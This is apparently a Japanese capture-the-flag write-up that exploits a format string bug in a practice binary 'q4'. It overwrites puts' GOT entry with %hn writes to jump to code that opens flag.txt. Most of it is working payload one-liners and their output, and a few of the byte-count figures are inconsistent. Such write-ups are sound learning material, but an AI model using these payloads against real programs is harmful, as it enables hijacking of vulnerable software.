・formatstring attackが可能(%nで値書き換えられる)
・bof出来ない(リターンアドレスが格納されてない）
・readelf -S q4でセクション見ると.got.plt書き換えられる！

GOT overwriteを使う



<---------------putsを呼ぶとき------------------------------------------------------>
call puts(0x80484c4)
↓
080484c4 <puts@plt>:
 80484c4:       ff 25 f4 99 04 08       jmp    DWORD PTR ds:0x80499f4 -> 0x080484ca <puts>
 80484ca:       68 30 00 00 00          push   0x30
 80484cf:       e9 80 ff ff ff          jmp    8048454 <_init+0x30>
<----------------------------------------------------------------------------------->

 0x80499f4の中身をformatstringを使って書き換えれば任意のアドレス
 {0x08048691 : fopen("r","flag.txt")な場所}
 に飛ばすことができる。
 バイナリを直でハードコードできないのでパイプを使う
 
<------以下----------------------------------------------------------->
$ python -c 'print "\xf4\x99\x04\x08%6$p"' | ./q4 

※リトルエンディアンで記入 %6$pは6番目の引数でテキストが格納されている。

What's your name?
Hi, 0x80499f4

Do you want the flag?
<----------------------------------------------------------------------->

次に%hn(文字数を2バイト書き込む)を使って値を書き込んでみる
(0x80499f4) -> 0x41414141 : "AAAA"
8バイト分(8文字)(\xf4\x99\x04\x08\xf4\x99\x04\x08)　※2つ目のアドレスは2バイトずらす(0x80499f4→0x80499f6)
アドレスは2バイトずらしてやる

0x4141 - 0x8 =              16697文字 -> %16697c%6$hn
0x4141 + 0x10000 - 0x4141 = 65536文字 -> %65536c%7$hn
↓
"\xf4\x99\x04\x08\xf6\x99\x04\x08 %16696c%6$hn%65536c%7$hn %6$s"

<------実行例----------------------------------------------------------->
$ python -c 'print "\xf4\x99\x04\x08\xf6\x99\x04\x08%16697c%6$hn%65536c%7$hn%6$s"' | ./q4 

What's your name?
Hi,                                                                             
#省略
                                                                           @AAAA・

Segmentation fault
<---------------------------------------------------------------------->

0x80499f4に0x08048691を書き込む
8バイト分(8文字)(\xf4\x99\x04\x08\xf6\x99\x04\x08)　※2つ目のアドレスは2バイトずらす(0x80499f4→0x80499f6)

0x8691 - 0x8 =              34441文字 -> %34441c%6$hn
0x0804 + 0x10000 - 0x8691 = 33139文字 -> %33139c%7$hn

"\xf4\x99\x04\x08\xf6\x99\x04\x08%34441c%6$hn%33139c%7$hn %6$s"

<------実行例----------------------------------------------------------->
$ python -c 'print "\xf4\x99\x04\x08\xf6\x99\x04\x08%34441c%6$hn%33139c%7$hn%6$s"' | ./q4 
What's your name?
Hi,
FLAG_????????????????
<---------------------------------------------------------------------->
